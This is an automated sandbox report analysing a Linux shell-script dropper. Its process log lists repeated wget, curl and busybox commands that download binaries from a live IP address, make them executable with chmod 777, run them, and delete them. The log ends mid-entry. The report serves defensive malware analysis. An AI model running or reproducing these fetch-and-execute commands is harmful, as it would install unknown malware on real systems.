Malware Analysis Report

2025-04-03 19:17

Sample ID 241120-d74ryazmcv
Target e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
SHA256 e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849

Threat Level: Shows suspicious behavior

The file e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 03:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 03:39

Reported

2024-11-20 03:42

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

60s

Max time network

135s

Command Line

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc N/A
N/A /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU N/A
N/A /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX N/A
N/A /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 N/A
N/A /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 N/A
N/A /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ N/A
N/A /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc N/A
N/A /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv N/A
N/A /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd N/A
N/A /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A
N/A /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU N/A
N/A /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX N/A
N/A /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 N/A
N/A /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 N/A
N/A /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ N/A
N/A /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc N/A
N/A /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc N/A
N/A /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv N/A
N/A /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd N/A
N/A /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /usr/bin/curl N/A
File opened for modification /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /usr/bin/curl N/A
File opened for modification /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /usr/bin/curl N/A
File opened for modification /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /usr/bin/curl N/A
File opened for modification /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /usr/bin/curl N/A
File opened for modification /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /usr/bin/curl N/A
File opened for modification /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /usr/bin/curl N/A
File opened for modification /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /usr/bin/curl N/A
File opened for modification /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /usr/bin/curl N/A
File opened for modification /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /usr/bin/curl N/A
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /usr/bin/curl N/A
File opened for modification /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /usr/bin/curl N/A
File opened for modification /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /usr/bin/curl N/A
File opened for modification /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /usr/bin/curl N/A
File opened for modification /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /usr/bin/curl N/A
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /usr/bin/curl N/A
File opened for modification /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /usr/bin/curl N/A
File opened for modification /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /usr/bin/curl N/A

Processes

/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/chmod

[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/rm

[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/chmod

[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU

[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/rm

[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/wget

[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/chmod

[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX

[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/rm

[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/wget

[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/chmod

[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7

[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/rm

[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/wget

[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/chmod

[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7

[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/rm

[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/wget

[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/chmod

[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ

[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/rm

[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/wget

[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/chmod

[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc

[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/rm

[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/wget

[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/chmod

[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv

[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/rm

[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/wget

[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/chmod

[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd

[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/rm

[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/wget

[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/chmod

[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp

[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/rm

[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/chmod

[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU

[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/rm

[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/wget

[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/chmod

[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX

[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/rm

[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/wget

[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/chmod

[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7

[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/rm

[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/wget

[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/chmod

[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7

[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/rm

[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/wget

[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/chmod

[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ

[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/rm

[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/wget

[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/chmod

[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/rm

[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/wget

[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/chmod

[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc

[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/rm

[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/wget

[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/chmod

[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv

[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/rm

[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/wget

[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/chmod

[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd

[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/rm

[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/wget

